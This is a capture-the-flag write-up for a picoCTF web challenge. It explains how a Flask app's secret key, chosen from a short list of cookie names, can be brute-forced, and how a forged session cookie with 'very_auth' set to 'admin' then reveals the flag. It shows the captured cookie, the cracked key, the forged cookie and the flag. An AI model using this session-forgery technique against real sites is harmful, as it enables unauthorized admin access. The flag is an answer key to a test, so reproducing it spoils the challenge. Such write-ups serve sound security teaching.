Problem

Alright, enough of using my own encryption. Flask session cookies should be plenty secure! server.py http://mercury.picoctf.net:18835/

• server.py

Solution

1. Looking at the server script we can see that the app’s secret key is set to a random cookie name:

   Copy

   cookie_names = ["snickerdoodle", "chocolate chip", "oatmeal raisin", "gingersnap", "shortbread", "peanut butter", "whoopie pie", "sugar", "molasses", "kiss", "biscotti", "butter", "spritz", "snowball", "drop", "thumbprint", "pinwheel", "wafer", "macaroon", "fortune", "crinkle", "icebox", "gingerbread", "tassie", "lebkuchen", "macaron", "black and white", "white chocolate macadamia"]
   app.secret_key = random.choice(cookie_names)

2. The app’s secret key is used to sign a flask session cookie so that it cannot be modified. However, since we know the secret key is one of the 28 cookie names, we can simply try them all until we successfully decrypt the cookie.

3. So, the first step is to go to the website and copy a session cookie: eyJ2ZXJ5X2F1dGgiOiJzbmlja2VyZG9vZGxlIn0.YFNV9A.fnwblKJPgNM2A8VNOblzALp9bTI

4. We can write a script that uses the logic from Flask’s SecureCookieSessionInterface to decode and encode cookies.

5. But first we need to determine what value we should set in the cookie. We can find this on lines 45-47 of the server code.

   Copy

   check = session["very_auth"]
   if check == "admin":
       resp = make_response(render_template("flag.html", value=flag_value, title=title))

   So, we need to store {"very_auth": "admin"} in the cookie.

6. Running the solve script will try each secret key and then once it successfully fins the key by decoding a know cookie, it will encode the above cookie data.

   Copy

   Secret Key: whoopie pie
   Admin Cookie: eyJ2ZXJ5X2F1dGgiOiJhZG1pbiJ9.YFNdhA.jyQttlEVJ3eQhTuA9cEp8FDC_fk

7. We can replace the cookie on the website with our admin cookie, refresh the page, and the flag will be shown.

Flag

picoCTF{pwn_4ll_th3_cook1E5_743c20eb}